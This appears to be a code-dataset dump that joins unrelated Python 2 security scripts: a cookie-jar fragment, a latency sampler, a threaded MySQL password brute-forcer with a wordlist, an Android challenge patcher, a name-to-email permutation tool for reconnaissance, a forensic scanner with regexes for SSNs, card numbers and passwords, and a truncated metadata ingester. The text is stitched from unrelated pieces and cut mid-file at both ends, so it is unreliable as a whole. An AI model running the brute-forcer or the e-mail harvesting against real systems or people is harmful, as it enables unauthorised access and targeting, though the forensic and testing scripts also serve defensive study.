value = unicode(cookie.value)
secure = bool(int(cookie.secure))
if value is None:
value = name
name = ""
last_accessed = int(time.time())
http_only = cookie.has_nonstandard_attr("HttpOnly")
query = cur.execute("""SELECT MAX(id) + 1 from moz_cookies""")
pk = query.fetchone()[0]
if pk is None:
pk = 1
return (pk, name, value, domain, path, expires,
last_accessed, secure, http_only)
def set_cookie(self, cookie):
if cookie.discard:
CookieJar.set_cookie(self, cookie)
return
def set_cookie(cur):
# XXX
# is this RFC 2965-correct?
# could this do an UPDATE instead?
row = self._row_from_cookie(cookie, cur)
name, unused, domain, path = row[1:5]
cur.execute("""\
DELETE FROM moz_cookies WHERE host = ? AND path = ? AND name = ?""",
(domain, path, name))
cur.execute("""\
INSERT INTO moz_cookies VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
""", row)
self._transaction(set_cookie)
def __iter__(self):
# session (non-persistent) cookies
for cookie in MappingIterator(self._cookies):
yield cookie
# persistent cookies
for row in self._query("""\
SELECT * FROM moz_cookies ORDER BY name, path, host"""):
yield self._cookie_from_row(row)
def _cookies_for_request(self, request):
session_cookies = CookieJar._cookies_for_request(self, request)
def get_cookies(cur):
query = cur.execute("SELECT host from moz_cookies")
domains = [row[0] for row in query.fetchall()]
cookies = []
for domain in domains:
cookies += self._persistent_cookies_for_domain(domain,
request, cur)
return cookies
persistent_coookies = self._transaction(get_cookies)
return session_cookies + persistent_coookies
def _persistent_cookies_for_domain(self, domain, request, cur):
cookies = []
if not self._policy.domain_return_ok(domain, request):
return []
debug("Checking %s for cookies to return", domain)
query = cur.execute("""\
SELECT * from moz_cookies WHERE host = ? ORDER BY path""",
(domain,))
cookies = [self._cookie_from_row(row) for row in query.fetchall()]
last_path = None
r = []
for cookie in cookies:
if (cookie.path != last_path and
not self._policy.path_return_ok(cookie.path, request)):
last_path = cookie.path
continue
if not self._policy.return_ok(cookie, request):
debug(" not returning cookie")
continue
debug(" it's a match")
r.append(cookie)
return r
| 32.518072 | 76 | 0.563811 |
cybersecurity-penetration-testing | import requests
import sys

# Usage: <script> <url>
# Samples the HTTP response time of <url> 100 times; the mean (seconds)
# is left in `average` for the report line that follows.
url = sys.argv[1]
values = []
for i in xrange(100):
    r = requests.get(url)
    # Bug fix: int(...) truncated sub-second latencies to 0, so the
    # computed average was almost always 0. Keep full float precision.
    values.append(r.elapsed.total_seconds())
average = sum(values) / float(len(values))
print "Average response time for "+url+" is "+str(average) | 20.25 | 58 | 0.69685 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import MySQLdb
class mysql_burp(object):
    """Threaded MySQL weak-credential scanner.

    Tries every ``user:pass`` pair from conf/mysql.conf against each
    discovered MySQL service and appends successful logins to a report.
    """

    def __init__(self,c):
        self.config=c
        self.lock=threading.Lock()  # serializes console/result writes across pool threads
        self.result=[]
        # Candidate credentials, one "user:pass" entry per line.
        self.lines=self.config.file2list("conf/mysql.conf")

    def mysql_connect(self,ip,username,password,port):
        # Return codes: 0 = login rejected, 1 = login succeeded,
        # 2 = service unreachable/other error (caller stops this host).
        crack =0
        try:
            db=MySQLdb.connect(ip,username,password,port=port)
            if db:
                crack=1
                db.close()
        except Exception, e:
            # MySQL error 1045 = access denied, i.e. wrong credentials.
            if e[0]==1045:
                self.lock.acquire()
                print "%s mysql's %s:%s login fail" %(ip,username,password)
                self.lock.release()
            else:
                self.lock.acquire()
                print "connect %s mysql service at %s login fail " %(ip,port)
                self.lock.release()
                crack=2
        return crack

    def mysq1(self,ip,port):
        # Worker: run the whole wordlist against one ip:port, stopping on
        # the first hit (flag==1) or on a connection error (flag==2).
        try:
            for data in self.lines:
                username=data.split(':')[0]
                password=data.split(':')[1]
                flag=self.mysql_connect(ip,username,password,port)
                if flag==2:
                    break
                if flag==1:
                    self.lock.acquire()
                    printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
                    self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
                    self.lock.release()
                    break
        except Exception,e:
            pass

    def run(self,ipdict,pinglist,threads,file):
        # Entry point: fan the per-host worker out over a thread pool,
        # then flush collected findings to the report file.
        if len(ipdict['mysql']):
            printPink("crack mysql now...")
            print "[*] start crack mysql %s" % time.ctime()
            starttime=time.time()
            pool=Pool(threads)
            for ip in ipdict['mysql']:
                pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()
            print "[*] stop crack mysql %s" % time.ctime()
            print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime)
            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
    # Stand-alone smoke test: brute-force a MySQL instance on localhost.
    import sys
    sys.path.append("../")
    from comm.config import *
    conf = config()
    targets = {'mysql': ['127.0.0.1:3306']}
    alive_hosts = ['127.0.0.1']
    scanner = mysql_burp(conf)
    scanner.run(targets, alive_hosts, 50, file="../result/test")
import random
import randomword
from patchers import patcher_interface
class data_in_memory(patcher_interface.patcher):
    '''
    Adds code that displays having data in memory
    '''
    # Relative challenge difficulty reported to the factory.
    difficulty = 1

    def patch(self):
        '''
        Adds Java code to display having unknown data from a static re perspective be stored in memory.

        Generates a randomly named StringBuilder that accumulates a random
        selection of android.os.Build device fields, sleeps 30 seconds (so
        the plaintext lingers in memory), then AES-encrypts the string and
        logs the Base64 ciphertext.  Returns the challenge description.
        '''
        self.logger("Adding encryption of device data in memory")
        # Random suffix keeps generated Java identifiers unique per build.
        str_builder_name = "{}{}".format(randomword.get_random_word(), random.randint(0, 1000))
        # Candidate Java statements, each appending one Build field.
        list_of_data_calls = [
            'stringBuilder{}.append(Build.DEVICE).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.MODEL).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.PRODUCT).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.BOARD).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.getRadioVersion()).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.BOOTLOADER).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.DISPLAY).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.FINGERPRINT).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.HARDWARE).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.HOST).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.ID).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.MANUFACTURER).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.TAGS).append(" ");\n'.format(str_builder_name),
            'stringBuilder{}.append(Build.TYPE).append(" ");\n'.format(str_builder_name)]
        str_builder = 'StringBuilder stringBuilder{} = new StringBuilder();\n'.format(str_builder_name)
        # Append 0-40 randomly chosen Build-field statements.
        for iterator in range(0, random.randint(0, 40)):
            str_builder = str_builder + random.choice(list_of_data_calls) + "\n"
        string_name = "{}{}".format(randomword.get_random_word(), random.randint(0, 1000))
        str_builder = str_builder + "String plainTextString{} = stringBuilder{}.toString();\n".format(string_name,
                                                                                                      str_builder_name)
        # 30s sleep keeps the plaintext resident in memory before encryption.
        str_builder = str_builder + '''try {
            TimeUnit.SECONDS.sleep(30);
        } catch (InterruptedException e) {
            e.printStackTrace();
        }'''
        # AES/CBC encryption of the collected data; ciphertext is logged.
        str_builder = str_builder + '''try {{
            Cipher cipher{cipher_var} = null;
            cipher{cipher_var} = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            KeyGenerator keygen{keygen_var} = null;
            keygen{keygen_var} = KeyGenerator.getInstance("AES");
            keygen{keygen_var}.init(256);
            SecretKey key{key_var} = keygen{keygen_var}.generateKey();
            byte[] plainText{plaintext_var} = plainTextString{string_var}.getBytes();
            cipher{cipher_var}.init(Cipher.ENCRYPT_MODE, key{key_var});
            byte[] cipherText{ciphertext_var} = new byte[0];
            cipherText{ciphertext_var} = cipher{cipher_var}.doFinal(plainText{plaintext_var});
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {{
                Log.v(getApplicationContext().getPackageName(), "Encrypted Data: "+Base64.getEncoder().encodeToString(cipherText{ciphertext_var}));
            }}
        }}catch (NoSuchAlgorithmException | InvalidKeyException | NoSuchPaddingException | IllegalBlockSizeException | BadPaddingException e) {{
            e.printStackTrace();
        }}\n'''.format(cipher_var=randomword.get_random_word() + str(random.randint(0, 1000)),
                       keygen_var=randomword.get_random_word() + str(random.randint(0, 1000)),
                       key_var=randomword.get_random_word() + str(random.randint(0, 1000)),
                       plaintext_var=randomword.get_random_word() + str(random.randint(0, 1000)),
                       string_var=string_name,
                       ciphertext_var=randomword.get_random_word() + str(random.randint(0, 1000)))
        # [0] = Java imports, [1] = code injected into MainActivity.
        code_block = [
            '''import android.os.Build; import android.util.Log; import java.security.InvalidKeyException;import java.security.NoSuchAlgorithmException;import java.util.Base64;import java.util.concurrent.TimeUnit;import javax.crypto.BadPaddingException;import javax.crypto.Cipher;import javax.crypto.IllegalBlockSizeException;import javax.crypto.KeyGenerator;import javax.crypto.NoSuchPaddingException;import javax.crypto.SecretKey;''',
            str_builder]
        mainActivity_file_path = self._get_path_to_file("MainActivity.java")
        self._add_imports_to_java_file(mainActivity_file_path, code_block[0])
        self._add_java_code_to_file(mainActivity_file_path, code_block[1])
        return "A series of device paramiters are being pulled off the device and immediately encrypted. However, are they in memory long enough for the data to be dumped?"
| 58.860465 | 436 | 0.632019 |
import sys
# Generate common corporate e-mail address permutations from a file of
# personal names (one "First [Middle] Last" name per line).
if len(sys.argv) !=3:
    print "usage: %s name.txt email suffix" % (sys.argv[0])
    sys.exit(0)
for line in open(sys.argv[1]):
    # Keep only letters and spaces, then split into lower-case name tokens;
    # first token is the given name, last token the surname.
    name = ''.join([c for c in line if c == " " or c.isalpha()])
    tokens = name.lower().split()
    fname = tokens[0]
    lname = tokens[-1]
    # Emit every common username pattern followed by the domain suffix.
    print fname +lname+sys.argv[2]
    print lname+fname+sys.argv[2]
    print fname+"."+lname+sys.argv[2]
    print lname+"."+fname+sys.argv[2]
    print lname+fname[0]+sys.argv[2]
    print fname+lname+fname+sys.argv[2]
    print fname[0]+lname+sys.argv[2]
    print fname[0]+"."+lname+sys.argv[2]
    print lname[0]+"."+fname+sys.argv[2]
    print fname+sys.argv[2]
    print lname+sys.argv[2]
'''
Copyright (c) 2016 Python Forensics and Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Revision History
v .95 Beta Initial Release (May 2016)
v .90 Alpha Initial Release Command Line Version (November 2015)
Written for:
Python 2.6.x or greater (not Python 3.x)
pfDiscover Support File
Includes the FileExaminer Class
'''
# Required Python Import Standard Library Modules
import os # OS Module
import re # Regular Expression Modules
import time # Time Module
import traceback            # Traceback exception Module
# Psuedo Constants
MAXBUFF = 1024 * 1024 * 16 # 16 Megabytes defines the size of
# of the memory chunks read
# Class: FileExaminer Class
#
# Desc: Handles all methods related to File Based Forensics
# Methods constructor: Initializes the Forensic File Object and Collects Basic Attributes
# File Size
# MAC Times
# Reads file into a buffer
# hashFile: Generates the selected one-way hash of the file
# destructor: Deletes the Forensic File Object
class FileExaminer:
# Constructor
    def __init__(self, theFile):
        """Collect basic forensic attributes for theFile (size, MAC times,
        ownership, type), open it for reading when possible, and load the
        optional zipdb.csv zipcode-to-city lookup table."""
        #Attributes of the Object
        self.lastError = "OK"
        # NOTE(review): 'mactimes' is initialized here but the values are
        # later stored in 'macTimes' (capital T); this placeholder is never
        # updated.
        self.mactimes = ["","",""]
        self.fileSize = 0
        self.fileOpen = False
        self.fileType = "unknown"
        self.uid = 0
        self.gid = 0
        self.mountPoint = False
        self.fileRead = False
        self.md5 = ""
        self.sha1 = ""
        self.path = theFile
        self.sha256 = ""
        self.sha512 = ""
        self.zipLookup = False
        self.emailDict = {} # Create empty dictionaries
        self.ssnDict = {}
        self.urlDict = {}
        self.pwDict = {}
        self.ccDict = {}
        self.usphDict = {}
        self.zipDict = {}
        self.zipDB = {}
        try:
            if os.path.exists(theFile):
                # get the file statistics
                theFileStat = os.stat(theFile)
                # get the MAC Times and store them in a list
                self.macTimes = []
                self.macTimes.append(time.ctime(theFileStat.st_mtime))
                self.macTimes.append(time.ctime(theFileStat.st_atime))
                self.macTimes.append(time.ctime(theFileStat.st_ctime))
                # get and store the File size
                self.fileSize = theFileStat.st_size
                # Get and store the ownership information
                self.uid = theFileStat.st_uid
                self.gid = theFileStat.st_gid
                if os.path.isfile(theFile):
                    self.fileType = "File"
                # Is this a real file?
                elif os.path.islink(theFile):
                    self.fileType = "Link"
                # Is This filename actually a directory?
                elif os.path.isdir(theFile):
                    self.fileType = "Directory"
                else:
                    self.fileType = "Unknown"
                # Is the pathname a mount point?
                if os.path.ismount(theFile):
                    self.mountPoint = True
                else:
                    self.mountPoint = False
                # Is the file Accessible for Read?
                if os.access(theFile, os.R_OK) and self.fileType == "File":
                    # Open the file to make sure we can access it
                    self.fp = open(theFile, 'rb')
                    self.fileOpen = True
                else:
                    self.fileRead = False
                try:
                    # Required zipdb comma separated value
                    # file containing zipcode to city lookup
                    with open("zipdb.csv", 'r') as zipData:
                        for line in zipData:
                            line=line.strip()
                            lineList = line.split(',')
                            if len(lineList) == 3:
                                key = lineList[0]
                                val = lineList[1:]
                                self.zipDB[key] = val
                    self.zipLookup = True
                except:
                    # zipdb.csv missing or malformed: postal-code lookups
                    # are simply disabled.
                    traceback.print_exc()
                    self.zipLookup = False
            else:
                self.lastError = "File does not exist"
        except:
            # Broad catch: any stat/open failure is recorded, not raised.
            self.lastError = "File Exception Raised"
# Function to Iterate through a large file
# the file was opened during init
    def readBUFF(self):
        """Read the next MAXBUFF-byte chunk from the open file and return it
        as a search-friendly string: every character outside the allowed
        ASCII set is replaced by a space.  Returns '' at end of file, which
        is the sentinel used by iter(self.readBUFF, '') in scanMem."""
        # Read in a bytearray
        ba = bytearray(self.fp.read(MAXBUFF))
        # substitute spaces for all non-ascii characters
        # this improves the performance and accuracy of the
        # regular expression searches
        txt = re.sub('[^A-Za-z0-9 ~!@#$%^&*:;<>,.?/\-\(\)=+_]', ' ', ba)
        # Return the resulting text string that will be searched
        return txt
#searches file for patterns matching
# e-mails
# SSN
# URL
# U.S. Phone Numbers
# U.S. Postal Codes
# Strong Passwords
# Credit Card Numbers
def scanMem(self, quiet):
if not quiet:
print "\nScanning Memory Image "
# compile the regular expressions
usphPattern = re.compile(r'(1?(?: |\-|\.)?(?:\(\d{3}\)|\d{3})(?: |\-|\.)?\d{3}(?: |\-|\.)?\d{4})')
emailPattern = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}')
ssnPattern = re.compile(r'\d{3}-\d{2}-\d{4}')
urlPattern = re.compile(r'\w+:\/\/[\w@][\w.:@]+\/?[\w\.?=%&=\-@/$,]*')
pwPattern = re.compile(r'[A-Za-z0-9~!@#$%^&*;:]{6,12}')
ccPattern = re.compile(r'(3[47]\d{2}([ -]?)(?!(\d)\3{5}|123456|234567|345678)\d{6}\2(?!(\d)\4{4})\d{5}|((4\d|5[1-5]|65)\d{2}|6011)([ -]?)(?!(\d)\8{3}|1234|3456|5678)\d{4}\7(?!(\d)\9{3})\d{4}\7\d{4})')
zipPattern = re.compile(r'(?!00[02-5]|099|213|269|34[358]|353|419|42[89]|51[789]|529|53[36]|552|5[67]8|5[78]9|621|6[348]2|6[46]3|659|69[4-9]|7[034]2|709|715|771|81[789]|8[3469]9|8[4568]8|8[6-9]6|8[68]7|9[02]9|987)\d{5}')
cnt = 0
gbProcessed = 0
# Iterate through the file one chunk at a time
for bArray in iter(self.readBUFF, ''):
# Provides user feedback one dot = 16MB Chunk Processed
if not quiet:
if cnt < 64:
cnt +=1
print '.',
else:
# Print GB processed
gbProcessed += 1
print
print "GB Processed: ", gbProcessed
cnt = 0
# Perform e-mail search
try:
# email
partialResult = emailPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.emailDict:
curValue = self.emailDict[key]
curValue +=1
self.emailDict[key] = curValue
else:
curValue = 1
self.emailDict[key] = curValue
except:
traceback.print_exc()
curValue = 1
self.emailDict[key] = curValue
# Search for Strong Passwords
try:
# Password
partialResult = pwPattern.findall(bArray)
for key in partialResult:
key = str(key)
upper=0
lower=0
number=0
special=0
for eachChr in key:
if eachChr in "abcdefghijklmnopqrstuvwxyz":
lower = 1
elif eachChr in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
upper = 1
elif eachChr in '1234567890':
number = 1
elif eachChr in '~!@#$%^&*':
special = 1
if upper == 1 and lower == 1 and number == 1:
# Keep track of the number of occurrences
if key in self.pwDict:
curValue = self.pwDict[key]
curValue +=1
self.pwDict[key] = curValue
else:
curValue = 1
self.pwDict[key] = curValue
except:
curValue = 1
self.emailDict[key] = curValue
# Search for possible SS#
try:
# ssn
partialResult = ssnPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.ssnDict:
curValue = self.ssnDict[key]
curValue +=1
self.ssnDict[key] = curValue
else:
curValue = 1
self.ssnDict[key] = curValue
except:
curValue = 1
self.ssnDict[key] = curValue
# Search for URL's
try:
# url
partialResult = urlPattern.findall(bArray)
for key in partialResult:
key = str(key)
if key in self.urlDict:
curValue = self.urlDict[key]
curValue +=1
self.urlDict[key] = curValue
else:
curValue = 1
self.urlDict[key] = curValue
except:
curValue = 1
self.urlDict[key] = curValue
# Search for Credit Cards
try:
# Credit Card
partialResult = ccPattern.findall(bArray)
# Keep track of the number of occurrences
for key in partialResult:
key=str(key[0])
key = key.translate(None, '- ')
if key in self.ccDict:
curValue = self.ccDict[key]
curValue +=1
self.ccDict[key] = curValue
else:
curValue = 1
self.ccDict[key] = curValue
except:
curValue = 1
self.ccDict[key] = curValue
# Search for Phone Numbers
try:
# Phone Number
partialResult = usphPattern.findall(bArray)
for key in partialResult:
key = str(key)
key = key.strip()
if key[0] in '23456789\(':
# Keep track of the number of occurrences
if key in self.usphDict:
curValue = self.usphDict[key]
curValue +=1
self.usphDict[key] = curValue
else:
curValue = 1
self.usphDict[key] = curValue
except:
curValue = 1
self.usphDict[key] = curValue
# Search for valid US Postal Codes
try:
# Valid US Postal Codes
partialResult = zipPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.zipDict:
curValue = self.zipDict[key]
curValue +=1
self.zipDict[key] = curValue
else:
curValue = 1
self.zipDict[key] = curValue
except:
curValue = 1
self.zipDict[key] = curValue
return True
def printEmails(self):
print "\nPossible E-Mails"
print "================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printURLs(self):
print "\nPossible URLs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printSSNs(self):
print "\nPossible SSNs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printPWs(self):
print "\nPossible PWs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printCCs(self):
print "\nPossible Credit Card #s"
print "=======================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printUSPHs(self):
print "\nPossible U.S. Phone #s"
print "=====================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printZIPs(self):
print "\nPossible Valid U.S. Postal Codes"
print "================================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
print '%5d' % entry[1], '%s' % entry[0], '%s' % valList[0], '%s' % valList[1]
else:
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def csvEmails(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvEmail.csv", 'w')
tempList = ['Count', 'Possible E-mails']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvEmail.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvURLs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvURL.csv", 'w')
tempList = ['Count', 'Possible URLs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvURL.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvSSNs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvSSN.csv", 'w')
tempList = ['Count', 'Possible SSNs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvSSN.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvPWs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvPW.csv", 'w')
tempList = ['Count', 'Possible Strong Passwords']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvPW.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvCCs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvCC.csv", 'w')
tempList = ['Count', 'Possible Credit Cards']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvCC.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
def csvUSPHs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvUSPH.csv", 'w')
tempList = ['Count', 'Possible U.S. Phone Numbers']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvUSPH.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvZIPs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvZIP.csv", 'w')
tempList = ['Count', 'Possible Valid U.S.Postal Codes']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvZIP.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
outStr = ",".join([str(entry[1]), entry[0], valList[0], valList[1]])
csvFile.write(outStr)
csvFile.write("\n")
else:
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def __del__(self):
return
# End Forensic File Class ====================================
| 37.24055 | 234 | 0.439676 |
import os
import sys
import logging
import csv
import sqlite3
import argparse
import datetime
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This script uses a database to ingest and report meta data information about active entries in directories'
def main(custodian, source, db):
    """
    The main function creates the database or table, logs execution status, and handles errors
    :param custodian: The name of the custodian
    :param source: tuple containing the mode 'input' or 'output' as the first elemnet and its arguments as the second
    :param db: The filepath for the database
    :return: None
    """
    logging.info('Initiating SQLite database: ' + db)
    conn = initDB(db)
    cur = conn.cursor()
    logging.info('Initialization Successful')
    logging.info('Retrieving or adding custodian: ' + custodian)
    custodian_id = getOrAddCustodian(cur, custodian)
    # getOrAddCustodian returns None right after inserting a new custodian,
    # so retry until the lookup succeeds.
    while not custodian_id:
        custodian_id = getOrAddCustodian(cur, custodian)
    logging.info('Custodian Retrieved')
    if source[0] == 'input':
        logging.info('Ingesting base input directory: ' + source[1])
        ingestDirectory(cur, source[1], custodian_id)
        conn.commit()
        logging.info('Ingest Complete')
    elif source[0] == 'output':
        logging.info('Preparing to write output: ' + source[1])
        writeOutput(cur, source[1], custodian)
    else:
        # NOTE(review): argparse.ArgumentError expects (argument, message);
        # this single-argument raise would itself fail -- confirm intent.
        raise argparse.ArgumentError('Could not interpret run time arguments')
    cur.close()
    conn.close()
    logging.info('Script Completed')
def initDB(db_path):
    """
    The initDB function opens or creates the database
    :param db_path: The filepath for the database
    :return: conn, the sqlite3 database connection
    """
    if os.path.exists(db_path):
        logging.info('Found Existing Database')
        return sqlite3.connect(db_path)
    else:
        logging.info('Existing database not found. Initializing new database')
        conn = sqlite3.connect(db_path)
        cur = conn.cursor()
        sql = 'CREATE TABLE Custodians (id INTEGER PRIMARY KEY, name TEXT);'
        cur.execute(sql)
        # NOTE(review): the foreign-key pragma is per-connection, so it is
        # only in effect here at creation time, not when the database is
        # reopened above -- confirm whether that matters.
        cur.execute('PRAGMA foreign_keys = 1;')
        sql = "CREATE TABLE Files(id INTEGER PRIMARY KEY, custodian INTEGER REFERENCES Custodians(id)," \
              "file_name TEXT, file_path TEXT, extension TEXT, file_size INTEGER, " \
              "mtime TEXT, ctime TEXT, atime TEXT, mode INTEGER, inode INTEGER);"
        cur.execute(sql)
        return conn
def getOrAddCustodian(cur, custodian):
    """
    The getOrAddCustodian function checks the database for a custodian and
    returns the ID, inserting a new row when the custodian is absent.
    :param cur: The sqlite3 database cursor object
    :param custodian: The name of the custodian
    :return: The custodian ID
    """
    # Parameterized query instead of string-built SQL (injection / quoting
    # safety, e.g. custodian names containing an apostrophe).
    cur.execute("SELECT id FROM Custodians WHERE name=?;", (custodian,))
    row = cur.fetchone()
    if row:
        return row[0]
    cur.execute("INSERT INTO Custodians (id, name) VALUES (null, ?);", (custodian,))
    # Improvement: return the freshly assigned primary key instead of None,
    # so callers no longer need a retry loop (the old retry loop still works
    # unchanged, it simply never iterates).
    return cur.lastrowid
def getCustodian(cur, custodian):
    """
    The getCustodian function checks the database for a custodian and returns the ID if present
    :param cur: The sqlite3 database cursor object
    :param custodian: The name of the custodian
    :return: The (id,) row tuple, or None when not found
    """
    # Parameterized query instead of .format() string interpolation: the old
    # version was SQL-injectable and broke on names containing quotes.
    cur.execute("SELECT id FROM Custodians WHERE name=?;", (custodian,))
    data = cur.fetchone()
    return data
def ingestDirectory(cur, source, custodian_id):
    """
    The ingestDirectory function reads file metadata and stores it in the database
    :param cur: The sqlite3 database cursor object
    :param source: The path for the root directory to recursively walk
    :param custodian_id: The custodian ID
    :return: None
    """
    count = 0
    for root, folders, files in os.walk(source):
        for file_name in files:
            meta_data = dict()
            try:
                meta_data['file_name'] = file_name
                meta_data['file_path'] = os.path.join(root, file_name)
                meta_data['extension'] = os.path.splitext(file_name)[-1]
                file_stats = os.stat(meta_data['file_path'])
                meta_data['mode'] = oct(file_stats.st_mode)
                meta_data['inode'] = int(file_stats.st_ino)
                meta_data['file_size'] = int(file_stats.st_size)
                meta_data['atime'] = formatTimestamp(file_stats.st_atime)
                meta_data['mtime'] = formatTimestamp(file_stats.st_mtime)
                meta_data['ctime'] = formatTimestamp(file_stats.st_ctime)
            except Exception as e:
                # .get guards the error message itself against a failed join
                logging.error('Could not gather data for file: ' + meta_data.get('file_path', file_name) + e.__str__())
            meta_data['custodian'] = custodian_id
            # Parameterized insert: the old string-built SQL was injectable
            # and broke on file names containing quotes; parameters also make
            # the manual 'string_escape' encoding unnecessary.
            columns = ', '.join('"{}"'.format(c) for c in meta_data.keys())
            placeholders = ', '.join('?' * len(meta_data))
            sql = 'INSERT INTO Files ({}) VALUES ({})'.format(columns, placeholders)
            cur.execute(sql, [str(v) for v in meta_data.values()])
            count += 1
    logging.info('Stored meta data for ' + str(count) + ' files.')
def formatTimestamp(ts):
    """Convert a POSIX timestamp to a 'YYYY-MM-DD HH:MM:SS' string.

    :param ts: An integer (or float) timestamp
    :return: The formatted local-time string
    """
    return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
def writeOutput(cur, source, custodian):
    """
